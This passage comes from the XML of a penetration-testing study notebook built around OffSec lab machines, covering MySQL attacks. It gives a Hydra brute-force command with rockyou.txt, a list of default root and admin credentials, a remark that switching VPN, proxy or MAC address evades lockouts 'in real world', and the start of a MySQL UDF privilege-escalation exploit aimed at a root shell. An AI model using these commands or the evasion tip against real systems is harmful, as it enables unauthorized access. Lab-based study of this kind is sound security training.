    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For passwords, use rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To run brute force, do: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P /usr/share/wordlists/rockyou.txt mysql://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.241.118</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 26 -f -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you run brute force, beware of being locked out. Look at the section below for more information. Might be better to try manual brute force first</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 26 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This sets the number of parallel connections (threads) Hydra will use. Here, it will use 26 threads, allowing for faster cracking but consuming more resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This tells Hydra to exit after finding the first valid username/password pair. This is useful if you only want to get in and don't need to find every possible valid password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : This is verbose mode. Hydra will show details of the login attempts it's making. If you want even more detail, you could use -V (uppercase) for "very verbose."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A30">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i3xf6d70baqh" w:id="213"/>
      <w:bookmarkEnd w:id="213"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting blocked due to automated bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId527">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they tried brute forcing MySQL using hydra, but they got blocked, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="91" name="image88.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image88.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId528"/>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1A34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got blocked due to multiple brute force illegal attempts. In real world, just changing the VPN / proxy + MAC changer will be alright.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our case, we reset the machine again and this time we try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with default common credentials.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A38">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A39">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hmxd07t7aqf0" w:id="214"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Bruteforce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -h $IP -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will prompt for password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are some combinations to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root: (no password)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A43">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to create user and database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We had to do this in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sams</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG play. Here is the walkthrough </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId529">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Medium Article behind paywall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53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the free version using Freedium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A48">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xkkcew8s3wl7" w:id="215"/>
      <w:bookmarkEnd w:id="215"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql User-Defined Function (UDF) priv esc for version ⅘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId531">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/1518</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1A4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for any mysql 4.x and 5.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId532">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pebbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when they ran myslq --version and saw it was MySql 5.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And they ran it to get root shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A50">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack assumes you already have foothold in target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A51">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A52">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Tib3rius Service Exploits video, they saw from Linux Smart Enumeration that we can login as root in mysql without password, and that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld (daemon) process is running as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="405" name="image266.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image266.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId417"/>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A54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="498" name="image482.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image482.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId533"/>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A55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A56">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check the version of mysql (assuming we are inside of the target machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: we want to find version of mysqld NOT mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="936"/>
        </w:numPr>
